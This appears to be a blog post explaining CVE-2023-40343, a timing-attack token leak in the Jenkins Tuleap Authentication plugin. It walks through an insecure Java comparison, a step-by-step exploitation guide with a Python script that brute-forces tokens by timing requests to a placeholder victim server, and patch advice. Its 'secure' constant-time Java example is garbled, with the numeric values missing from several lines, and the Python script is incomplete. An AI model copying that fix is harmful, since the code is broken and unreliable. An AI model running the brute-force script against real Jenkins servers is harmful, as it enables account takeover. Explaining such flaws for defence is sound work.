CVE-2023-40343 - How Jenkins Tuleap Authentication Plugin Leaks Tokens via Timing Attacks

## Introduction

Jenkins is one of the world’s most famous automation servers. It relies heavily on plugins to deliver its powers, and authentication plugins are an important class for security. This post examines a critical vulnerability—CVE-2023-40343—found in the Jenkins Tuleap Authentication plugin, specifically version 1.1.20 and before. This issue enables attackers to recover authentication tokens via timing attacks, putting your Jenkins instance at risk.


## What is CVE-2023-40343?

CVE-2023-40343 lets remote attackers extract valid authentication tokens from Jenkins servers using the Tuleap Authentication Plugin. The culprit is the use of a regular comparison function (== or .equals()) that does not run in constant time. Skilled attackers can measure how long the server takes to compare different parts of the token, guessing the value byte by byte.

Severity: Medium to High

- Plugin Affected: Jenkins Tuleap Authentication Plugin <= 1.1.20
- CWE Reference: CWE-208: Observable Timing Discrepancy


## Understanding Timing Attacks

Timing attacks focus on how long it takes a system to process values—especially secrets like tokens or passwords. Here’s the classic vulnerability:

Systems often compare tokens using simple loops that stop at the first mismatch.

- If you guess the first character correctly, the system takes longer; the more you get right, the longer it takes.

Analogy

It’s like a lock where the more digits you get right, the longer it takes to open. By counting "clicks," a thief can slowly learn the whole code.


## Digging Into the Code

Here’s a simplified Java-style example of how not to compare tokens

// INSECURE: Regular equals() comparison
public boolean isValidToken(String userInput, String validToken) {
    return userInput.equals(validToken);
}

Most .equals() implementations return false as soon as a character doesn’t match. If an attacker times requests with partial matches, they can guess the token piece by piece.

A constant-time comparison—which is NOT used in vulnerable versions—might look like

// SECURE: Constant-time comparison
public boolean isValidToken(byte[] userInput, byte[] validToken) {
    if (userInput.length != validToken.length) return false;
    int result = ;
    for (int i = ; i < userInput.length; i++) {
        result |= userInput[i] ^ validToken[i];
    }
    return result == ;
}

The above version always compares each byte in the arrays, regardless of mismatches, making it impossible (or much, much harder) to leak token details by timing.


## Exploitation: Step-by-Step Example

1. Reconnaissance

Find a Jenkins server running the vulnerable Tuleap Authentication Plugin. Try logging in with invalid tokens and measure the response time.

2. Script the Attack

Use a tool or custom script to send many authentication attempts, varying one character at a time.

Example in Python (conceptual)

import time
import requests
import string

target_url = 'https://jenkins-victim.com/plugin/tuleap-oauth/auth';
known_token_prefix = ''

for i in range(desired_token_length):
    for c in string.ascii_letters + string.digits:
        test_token = known_token_prefix + c + 'A' * (desired_token_length - len(known_token_prefix) - 1)
        post_data = {'token': test_token}
        t1 = time.time()
        resp = requests.post(target_url, data=post_data)
        t2 = time.time()
        print(f'Try {test_token}: {t2 - t1:.5f}s')
        # If timing is noticeably higher, it means you have guessed an extra correct character.
    # Append the correct character to known_token_prefix once found.

Attackers repeat this until the entire token is reconstructed. This approach is slow but deadly—especially against high-value systems.

3. Get In

Once a valid token is found, log in as the victim, fully bypassing security.


## Mitigations and Recommendations

If you’re using Jenkins Tuleap Authentication Plugin 1.1.20 or earlier, upgrade immediately.

- See the latest version at Jenkins Plugin Site.

Slow down brute-force attempts to make timing attacks impractical.

## References

- Jenkins Tuleap Authentication Plugin Security Advisory (CVE-2023-40343)
- Official Plugin Page
- CWE-208: Observable Timing Discrepancy
- Github: ConstantTimeEquals Example
- OWASP: Timing Attack


In brief:  
CVE-2023-40343 is a classic, textbook timing attack caused by non-constant time string comparisons in authentication logic. Even security plugins can create simple but critical bugs if care is not taken with secret data. Patch now, and always handle tokens with caution!

Timeline

Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/18/2023 20:04:00 UTC